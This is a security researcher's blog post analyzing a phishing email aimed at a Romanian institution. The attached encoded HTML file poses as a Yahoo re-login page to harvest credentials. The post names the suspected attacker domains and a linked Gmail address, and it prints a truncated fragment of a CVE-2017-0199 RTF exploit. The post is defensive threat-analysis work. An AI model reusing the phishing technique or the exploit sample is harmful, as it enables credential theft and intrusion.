full screen background image
Search
Monday 22 January 2018
  • :
  • :

Nigerian Yahoo phishing mail with java script.

The CEO of an institution sent me the email he received this days at the institution’s email address.
An invoice from an unrelated company.

Hi,
Please send me the order signed and stamped.

Thanks.


Is an old client and knows about cybersecurity .He did not want to open this suspicious email.
He sent it to me to analyze the file they had received.

So… let’s help our clients! 😉

A coded .htm file with some addresses included.

When you open the file, a Yahoo page appears telling you that the session has expired and you must log in again.
In this way you will enter the log-in data and these will be sent to the addresses shown above.

fademacompany.com.ng & igea.info

They have start on 2017-03-14 with DHL phishing.

Both are linked to an email address: onyekaemmanuel158[@]gmail.com

…AND the email is linked more domains hoste in Nigeria.

fademacompany.com.ng
igea.info
kikoloe.com
rnsahinet.net
longtirne-lpg.com
eqoteck.com

Some of them have the same message on the main domain, but all of them have some files uploaded.

In one of them i found an .rtf exploit uploaded.

Exploit toolkit CVE-2017-0199

{\rt{\object\objautlink\objupdate\rsltpict\objw9579\objh8486\objscalex893748\objscaley4368{\*\objclass \’77\’6F\’72\’64\’2E\’64\’6F\’63\’75\’4D\’65\’4E\’74\’2E\’33\’35\’39\’39\’35\’33}{\*\objdata…

Phishing files are also hosted for linkedin, microsoft, DHL, google… and more.

On the next picture you may see the relationship between the extracted data.

What I would like to find out is why it was written in Romanian for a Romanian institution and if was something random or a fixed target.
The institution is an important one … so everything is possible.

So this is it!

This was not just an email!

Prodefence.org

Have fun & Stay safe!

Reviews

  • 9
  • 9
  • 8
  • 9
  • 7
  • 8.4

    Score



Alex Anghelus

Cyber Security, Pentesting & Ethical Hacking Freelancer - Malware Reverse Engineering Researcher


Leave a Reply

Your email address will not be published. Required fields are marked *